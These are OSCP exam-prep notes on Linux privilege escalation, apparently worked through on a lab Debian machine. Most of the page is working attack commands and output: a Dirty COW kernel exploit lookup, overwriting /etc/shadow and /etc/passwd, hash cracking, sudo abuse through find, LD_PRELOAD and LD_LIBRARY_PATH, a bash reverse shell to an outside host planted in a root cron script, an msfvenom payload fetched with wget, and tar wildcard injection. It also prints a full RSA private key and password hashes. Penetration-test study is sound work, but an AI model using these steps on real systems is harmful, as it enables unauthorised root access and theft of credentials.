> For the complete documentation index, see [llms.txt](https://manuelvazquez-contact.gitbook.io/oscp-prep/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://manuelvazquez-contact.gitbook.io/oscp-prep/privelege-escalation/linux-privilege-escalation.md). # Linux Privilege Escalation ## Kernel Exploits ### What is a Kernel? * ***THIS SHOULD BE YOUR LAST RESORT, Kernel exploits can be unstable and may crash the system!*** * Kernels are the core of any operating system * Think of it as a layer between application software and the actual computer hardware. * Kernel has the complete control over the operating system. This can result in execution as the root users ### How do I find Kernel Exploits? 1. Enumerate kernel versions (uname -a ) 2. Find matching exploits (Google, ExploitDB, GitHub) 3. Compile and run ### Kernel Exploit Example ![](/files/-MQ8chVnYKM7s9UutSsP) * Kernel Version is 2.6.32 #### Using Searchsploit to find exploit ![No matches](/files/-MQ8gIbajqgWsjA816JF) #### More specific search ![No luck :(](/files/-MQ8glDhBVogn0ilUOUE) #### Using Linux Exploit Suggesster 2 {% embed url="" %} ``` ./linux-exploit-suggester-2.pl -k 2.6.32 ############################# Linux Exploit Suggester 2 ############################# Local Kernel: 2.6.32 Searching 72 exploits... Possible Exploits [1] american-sign-language CVE-2010-4347 Source: http://www.securityfocus.com/bid/45408 [2] can_bcm CVE-2010-2959 Source: http://www.exploit-db.com/exploits/14814 [3] dirty_cow CVE-2016-5195 Source: http://www.exploit-db.com/exploits/40616 [4] exploit_x CVE-2018-14665 Source: http://www.exploit-db.com/exploits/45697 [5] half_nelson1 Alt: econet CVE-2010-3848 Source: http://www.exploit-db.com/exploits/17787 [6] half_nelson2 Alt: econet CVE-2010-3850 Source: http://www.exploit-db.com/exploits/17787 [7] half_nelson3 Alt: econet CVE-2010-4073 Source: http://www.exploit-db.com/exploits/17787 [8] msr CVE-2013-0268 Source: http://www.exploit-db.com/exploits/27297 [9] pktcdvd CVE-2010-3437 Source: http://www.exploit-db.com/exploits/15150 [10] ptrace_kmod2 Alt: ia32syscall,robert_you_suck CVE-2010-3301 Source: http://www.exploit-db.com/exploits/15023 [11] rawmodePTY CVE-2014-0196 Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c [12] rds CVE-2010-3904 Source: http://www.exploit-db.com/exploits/15285 [13] reiserfs CVE-2010-1146 Source: http://www.exploit-db.com/exploits/12130 [14] video4linux CVE-2010-3081 Source: http://www.exploit-db.com/exploits/15024 ``` Looking at the results, we can see that we have a popular kernel exploit (Dirty COW) {% embed url="" %} ![](/files/-MQ8iD7_sSjR760Paj22) #### Run exploit and execute /usr/bin/passwd binary ![](/files/-MQ8k96N-tjhrhrZKjo-) ## Service Exploits ### What are Services? * Programs that run in the background, acceptin input or performing regular tasks. * If vulnerable services are running as root, exploitin them can lead to command exection as root. * Service exploits can be found using Searchsploit, Google and GitHub. ### Services Running as Root The follwing command will show all processes that are running as root. ``` ps aux | grep "^root" ``` With the results, as with any, try to identify the version number of the program being executed. ### Enumerating Program Versions ``` --version -v #DPKG CAN SHOW INSTALLED PROGRAMS AND THEIR VERSION dpkg -l | grep #RPM SYSTEMS rpm -qa | grep ``` ### Service Exploit Example ``` ./lse.sh -l 1 -i ``` ![](/files/-MQ9-lKGTX2-3Hx6Tinf) * MySQL is running as root . * You can connect to MySQL as root without a password! ![version 5.1.73](/files/-MQ91-dMw1rcAnrBk3aF) You can verify with: ``` ps aux | grep '^root' ``` This will list processes that run as root \*mysqld #### Why is this important? MySQL has the ability to install user defined functions which run via shared objects. The following exploit can be used to install a new function that will allow us to execute system commands from a mysql command prompt. commands will be executed as root because mysql is running as root. {% embed url="" %} ``` gcc -g -c raptor_udf2.c -fPIC Execute commands ``` ## Port Forwarding 'Sometimes root processes may be bound to an internal port, through which it communicates. You can forward the port using the follwing SSH command: ``` ssh -R :127.0.0.1: @ ``` ``` #Determice which port MYSQL is listening. netstat -nl #ON OUR TARGET MACHINE ssh -R 4444:127.0.0.1:3306 kali@10.0.2.4 #ON OUR KALI MACHINE mysql -u root -h 127.0.0.1 -P 4444 select @@hostname; ``` ## Weak File Permissions If permissions on files are weak, system files can be taken advantage of to perform privelege escalation. * /etc/shadow contains password hashes and by default is only readable by root. * If we can read this file, we may be able to crack the root users hash. * If we can modify, we can replace root user hash with a hash we know. ``` ./lin.sh -i | more !] sys030 Can we read /etc/shadow file?................................... yes! --- root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7::: daemon:*:17298:0:99999:7::: bin:*:17298:0:99999:7::: sys:*:17298:0:99999:7::: sync:*:17298:0:99999:7::: games:*:17298:0:99999:7::: man:*:17298:0:99999:7::: lp:*:17298:0:99999:7::: mail:*:17298:0:99999:7::: news:*:17298:0:99999:7::: uucp:*:17298:0:99999:7::: proxy:*:17298:0:99999:7::: www-data:*:17298:0:99999:7::: backup:*:17298:0:99999:7::: list:*:17298:0:99999:7::: irc:*:17298:0:99999:7::: gnats:*:17298:0:99999:7::: nobody:*:17298:0:99999:7::: libuuid:!:17298:0:99999:7::: Debian-exim:!:17298:0:99999:7::: sshd:*:17298:0:99999:7::: user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7::: statd:*:17299:0:99999:7::: mysql:!:18133:0:99999:7::: #We have readble and writeable user@debian:~/tools/privesc-scripts$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~/tools/privesc-scripts$ user@debian:~/tools/privesc-scripts$ head -n 1 /etc/shadow root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7::: user@debian:~/tools/privesc-scripts$ ``` This is important, the first two colons contain the hash.in this case it is: ``` $6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0 ``` ### Cracking the hash ``` kali@kali:~$ sudo john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status password123 (?) 1g 0:00:00:00 DONE (2021-01-04 19:48) 1.515g/s 2327p/s 2327c/s 2327C/s cuties..mexico1 Use the "--show" option to display all of the cracked passwords reliably Session completed ``` ### Writing to shadow Similarly, because we can write onto the shadow file. ``` ./lse -l 1 -i | more [*] fst000 Writable files outside user's home.............................. yes! --- /var/tmp /var/run/acpid.socket /var/run/mysqld/mysqld.sock /var/lock /etc/exports /etc/init.d/rc.local /etc/passwd /etc/shadow /usr/local/bin/overwrite.sh /usr/lib/mysql/plugin/raptor_udf2.so /tmp /tmp/tmp.xW1WW6YYpu /tmp/tmp.bm5h9a7TlX --- user@debian:~/tools/privesc-scripts$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~/tools/privesc-scripts$ cp /etc/shadow /home/user/shadow_backup user@debian:~/tools/privesc-scripts$ cd user@debian:~$ ls myvpn.ovpn shadow_backup tools user@debian:~$ mkpasswd -m sha-512 newpassword $6$U/HhooXBT/y$YW6kInvyKKJUpIj53rarfn9rMaTWfKlw91KpRHPW88bVzPj3KAgFkYeb4sNZmoC7SfTS5lAYRhRVIyiEe4rjE. user@debian:~$ user@debian:~$ mkpasswd -m sha-512 newpassword $6$U/HhooXBT/y$YW6kInvyKKJUpIj53rarfn9rMaTWfKlw91KpRHPW88bVzPj3KAgFkYeb4sNZmoC7SfTS5lAYRhRVIyiEe4rjE. user@debian:~$ vim /etc/shadow user@debian:~$ su Password: root@debian:/home/user# ``` ### Reading and Writing passwd file * /etc/passwd used to contain hashes, back in the day. * passwd takes precedent over the shadow file * ![](/files/-MQF7i6T0bpcYe9NGwEt) ``` root@debian:/home/user# ls -l /etc/passwd -rw-r--rw- 1 root root 1009 Aug 25 2019 /etc/passwd root@debian:/home/user# openssl passwd "password" YQyhPgG7w5s3s root@debian:/home/user# vi /etc/passwd root@debian:/home/user# exit exit user@debian:~$ su Password: root@debian:/home/user# id uid=0(root) gid=0(root) groups=0(root) root@debian:/home/user# can also create a new user with root privleges by copying code to teh bottom as long as uid is 0 it is root ``` ### Backups * Eventhough backups may exist, they may be insecure backups. Check /home / (root) /tmp /var/backups ``` root@debian:/.ssh# cat root_key -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA3IIf6Wczcdm38MZ9+QADSYq9FfKfwj0mJaUteyJHWHZ3/GNm gLTH3Fov2Ss8QuGfvvD4CQ1f4N0PqnaJ2WJrKSP8QyxJ7YtRTk0JoTSGWTeUpExl p4oSmTxYnO0LDcsezwNhBZn0kljtGu9p+dmmKbk40W4SWlTvU1LcEHRr6RgWMgQo OHhxUFddFtYrknS4GiL5TJH6bt57xoIECnRc/8suZyWzgRzbo+TvDewK3ZhBN7HD eV9G5JrjnVrDqSjhysUANmUTjUCTSsofUwlum+pU/dl9YCkXJRp7Hgy/QkFKpFET Z36Z0g1JtQkwWxUD/iFj+iapkLuMaVT5dCq9kQIDAQABAoIBAQDDWdSDppYA6uz2 NiMsEULYSD0z0HqQTjQZbbhZOgkS6gFqa3VH2OCm6o8xSghdCB3Jvxk+i8bBI5bZ YaLGH1boX6UArZ/g/mfNgpphYnMTXxYkaDo2ry/C6Z9nhukgEy78HvY5TCdL79Q+ 5JNyccuvcxRPFcDUniJYIzQqr7laCgNU2R1lL87Qai6B6gJpyB9cP68rA02244el WUXcZTk68p9dk2Q3tk3r/oYHf2LTkgPShXBEwP1VkF/2FFPvwi1JCCMUGS27avN7 VDFru8hDPCCmE3j4N9Sw6X/sSDR9ESg4+iNTsD2ziwGDYnizzY2e1+75zLyYZ4N7 6JoPCYFxAoGBAPi0ALpmNz17iFClfIqDrunUy8JT4aFxl0kQ5y9rKeFwNu50nTIW 1X+343539fKIcuPB0JY9ZkO9d4tp8M1Slebv/p4ITdKf43yTjClbd/FpyG2QNy3K 824ihKlQVDC9eYezWWs2pqZk/AqO2IHSlzL4v0T0GyzOsKJH6NGTvYhrAoGBAOL6 Wg07OXE08XsLJE+ujVPH4DQMqRz/G1vwztPkSmeqZ8/qsLW2bINLhndZdd1FaPzc U7LXiuDNcl5u+Pihbv73rPNZOsixkklb5t3Jg1OcvvYcL6hMRwLL4iqG8YDBmlK1 Rg1CjY1csnqTOMJUVEHy0ofroEMLf/0uVRP3VsDzAoGBAIKFJSSt5Cu2GxIH51Zi SXeaH906XF132aeU4V83ZGFVnN6EAMN6zE0c2p1So5bHGVSCMM/IJVVDp+tYi/GV d+oc5YlWXlE9bAvC+3nw8P+XPoKRfwPfUOXp46lf6O8zYQZgj3r+0XLd6JA561Im jQdJGEg9u81GI9jm2D60xHFFAoGAPFatRcMuvAeFAl6t4njWnSUPVwbelhTDIyfa 871GglRskHslSskaA7U6I9QmXxIqnL29ild+VdCHzM7XZNEVfrY8xdw8okmCR/ok X2VIghuzMB3CFY1hez7T+tYwsTfGXKJP4wqEMsYntCoa9p4QYA+7I+LhkbEm7xk4 CLzB1T0CgYB2Ijb2DpcWlxjX08JRVi8+R7T2Fhh4L5FuykcDeZm1OvYeCML32EfN Whp/Mr5B5GDmMHBRtKaiLS8/NRAokiibsCmMzQegmfipo+35DNTW66DDq47RFgR4 LnM9yXzn+CbIJGeJk5XUFQuLSv0f6uiaWNi7t9UNyayRmwejI6phSw== -----END RSA PRIVATE KEY----- root@debian:/.ssh# gretp PermitRootLogin /etc/ssh/sshd_config bash: gretp: command not found root@debian:/.ssh# grep PermitRootLogin /etc/ssh/sshd_config PermitRootLogin yes # the setting of "PermitRootLogin without-password". root@debian:/.ssh# kali@kali:~$ vi root_key kali@kali:~$ chmod 600 root_key kali@kali:~$ ssh -i root_key root@10.0.2.7 Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Jan 3 14:00:26 2021 root@debian:~# id uid=0(root) gid=0(root) groups=0(root) root@debian:~# ``` ## Running Sudo ``` user@debian:~/tools/privesc-scripts$ ./lse.sh -i | more [!] sud010 Can we list sudo commands without a password?................... yes! --- Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH User user may run the following commands on this host: (root) NOPASSWD: /usr/sbin/iftop (root) NOPASSWD: /usr/bin/find (root) NOPASSWD: /usr/bin/nano (root) NOPASSWD: /usr/bin/vim (root) NOPASSWD: /usr/bin/man (root) NOPASSWD: /usr/bin/awk (root) NOPASSWD: /usr/bin/less (root) NOPASSWD: /usr/bin/ftp (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/sbin/apache2 (root) NOPASSWD: /bin/more user@debian:~/tools/privesc-scripts$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH User user may run the following commands on this host: (root) NOPASSWD: /usr/sbin/iftop (root) NOPASSWD: /usr/bin/find (root) NOPASSWD: /usr/bin/nano (root) NOPASSWD: /usr/bin/vim (root) NOPASSWD: /usr/bin/man (root) NOPASSWD: /usr/bin/awk (root) NOPASSWD: /usr/bin/less (root) NOPASSWD: /usr/bin/ftp (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/sbin/apache2 (root) NOPASSWD: /bin/more ``` {% embed url="" %} ``` user@debian:~/tools/privesc-scripts$ sudo find . -exec /bin/sh \; -quit sh-4.1# id uid=0(root) gid=0(root) groups=0(root) sh-4.1# whoami root ``` ### Utilizing Apache ``` user@debian:~/tools/privesc-scripts$ sudo apache2 -f /etc/shadow Syntax error on line 1 of /etc/shadow: Invalid command 'root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration ``` ### LD\_Preload ``` user@debian:~/tools/sudo$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH User user may run the following commands on this host: (root) NOPASSWD: /usr/sbin/iftop (root) NOPASSWD: /usr/bin/find (root) NOPASSWD: /usr/bin/nano (root) NOPASSWD: /usr/bin/vim (root) NOPASSWD: /usr/bin/man (root) NOPASSWD: /usr/bin/awk (root) NOPASSWD: /usr/bin/less (root) NOPASSWD: /usr/bin/ftp (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/sbin/apache2 (root) NOPASSWD: /bin/more user@debian:~/tools/sudo$ ls -l total 8 -rw-r--r-- 1 user user 184 May 15 2020 library_path.c -rw-r--r-- 1 user user 149 May 15 2020 preload.c user@debian:~/tools/sudo$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c user@debian:~/tools/sudo$ sudo LD_PRELOAD=/tmp/preload.so find root@debian:/home/user/tools/sudo# id uid=0(root) gid=0(root) groups=0(root) root@debian:/home/user/tools/sudo# whoami root ``` ### LD\_LIBRARY\_PATH * This environment variable contains a set of directories where shared libraries are searched first * ldd command can be used to print the shared libraries used by a program * ``` ldd /usr/sbin/apache2 ``` By creating a library with the same name as the one used by a program, and setting LD*LIBRARY\_PATH* to its parent directory, the program will load our shared library instead. ``` user@debian:~/tools/sudo$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH User user may run the following commands on this host: (root) NOPASSWD: /usr/sbin/iftop (root) NOPASSWD: /usr/bin/find (root) NOPASSWD: /usr/bin/nano (root) NOPASSWD: /usr/bin/vim (root) NOPASSWD: /usr/bin/man (root) NOPASSWD: /usr/bin/awk (root) NOPASSWD: /usr/bin/less (root) NOPASSWD: /usr/bin/ftp (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/sbin/apache2 (root) NOPASSWD: /bin/more user@debian:~/tools/sudo$ ldd /usr/sbin/apache2 linux-vdso.so.1 => (0x00007fff42178000) libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fa3a02e8000) libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fa3a00c4000) libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fa39fe8a000) libpthread.so.0 => /lib/libpthread.so.0 (0x00007fa39fc6e000) libc.so.6 => /lib/libc.so.6 (0x00007fa39f902000) libuuid.so.1 => /lib/libuuid.so.1 (0x00007fa39f6fd000) librt.so.1 => /lib/librt.so.1 (0x00007fa39f4f5000) libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fa39f2be000) libdl.so.2 => /lib/libdl.so.2 (0x00007fa39f0b9000) libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fa39ee91000) /lib64/ld-linux-x86-64.so.2 (0x00007fa3a07a5000) user@debian:~/tools/sudo$ ls library_path.c preload.c user@debian:~/tools/sudo$ gcc -o libcrypt.so.1 -shared -fPIC library_path.c user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=. apache2 apache2: ./libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0) root@debian:/home/user/tools/sudo# id uid=0(root) gid=0(root) groups=0(root) root@debian:/home/user/tools/sudo# ``` ## CronJOBBERS * Cronjobs are programs or scripts that run at a scheduled time at certain time intervals * Crontabs store configuration for cronjobs. These are located at. * /var/spool/cron/ * /var/spool/cro!n/crontabs/ * systemwide /etc/crontab ### File Permissions Misconfiguration of a file permission associated with a cronjob can lead to easy Root! ``` ./lse.sh -l 1 -i | more [*] ret020 Cron jobs....................................................... yes! --- /etc/crontab:SHELL=/bin/sh /etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin /etc/crontab:17 * * * * root cd / && run-parts --report /etc/cron.hourly /etc/crontab:25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) /etc/crontab:47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) /etc/crontab:52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) /etc/crontab:* * * * * root overwrite.sh /etc/crontab:* * * * * root /usr/local/bin/compress.sh q:q^Cuser@debian:~/tools/privesc-scripts$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # * * * * * root overwrite.sh * * * * * root /usr/local/bin/compress.sh user@debian:~/tools/privesc-scripts$ locate overwrite.sh /usr/local/bin/overwrite.sh user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh -rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh user@debian:~/tools/privesc-scripts$ #REVERSE SHELL ON THE JOBBER user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh -rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh user@debian:~/tools/privesc-scripts$ cat /usr/local/bin/overwrite.sh #!/bin/bash /bin/bash -i >& /dev/tcp/10.0.2.4/1111 0>&1 user@debian:~/tools/privesc-scripts$ ``` ### Writing Paths present in Cronjobs * PATH Environment variable is by default set to /usr/bin/:bin * PATH variable can be overwritten in the crontab file * If cronjob does not use an absolute path, and one of the PATH directories is writeable by our user, we may be able to create a program/script with the same name as the cronjob ``` ./lse.sh -l 1 -i | more [!] ret060 Can we write to executable paths present in cron jobs........... yes! --- /etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin user@debian:~/tools/privesc-scripts$ vim overwrite.sh user@debian:~/tools/privesc-scripts$ chmod +x overwrite.sh user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp user@debian:~/tools/privesc-scripts$ pwd /home/user/tools/privesc-scripts user@debian:~/tools/privesc-scripts$ cp overwrite.sh /home/user/ user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp user@debian:~/tools/privesc-scripts$ ls -l /tmp/ total 1044 -rw-r--r-- 1 root root 100740 Jan 4 08:29 backup.tar.gz -rwxr-xr-x 1 user user 3857 Jan 4 07:36 preload.so -rwsr-sr-x 1 root root 926536 Jan 4 08:29 rootbash -rw------- 1 user user 7817 Jan 4 08:04 tmp.5CqN3heSzG -rw------- 1 user user 11151 Jan 4 08:03 tmp.EVXGVRQj7P -rw-r--r-- 1 root root 28 Jan 4 08:09 useless user@debian:~/tools/privesc-scripts$ /tmp/rootbash -p rootbash-4.1# id uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user) rootbash-4.1# whoami root ``` ### WildCards {% embed url="" %} #### On our Attacker Machine ``` msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.2.4 LPORT=4444 -f elf -o shell.elf ``` #### On our target machine ``` user@debian:~$ cat /usr/local/bin/compress.sh #!/bin/sh cd /home/user tar czf /tmp/backup.tar.gz * user@debian:~$ wget http://10.0.2.4:80/shell.elf --2021-01-04 08:39:27-- http://10.0.2.4/shell.elf Connecting to 10.0.2.4:80... connected. HTTP request sent, awaiting response... 200 OK Length: 194 [application/octet-stream] Saving to: “shell.elf” 100%[=================================================================================================================>] 194 --.-K/s in 0s 2021-01-04 08:39:27 (52.0 MB/s) - “shell.elf” saved [194/194] user@debian:~$ ls myvpn.ovpn overwrite.sh shadow_backup shell.elf tools user@debian:~$ chmod +x shell.elf user@debian:~$ touch ./--checkpoint=1 user@debian:~$ touch ./--checkpoint-action=exec=shell.elf user@debian:~$ ``` #### Attacker machine ``` kali@kali:~$ nc -lvnp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.0.2.7. Ncat: Connection from 10.0.2.7:55114. id uid=0(root) gid=0(root) groups=0(root) ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://manuelvazquez-contact.gitbook.io/oscp-prep/privelege-escalation/linux-privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.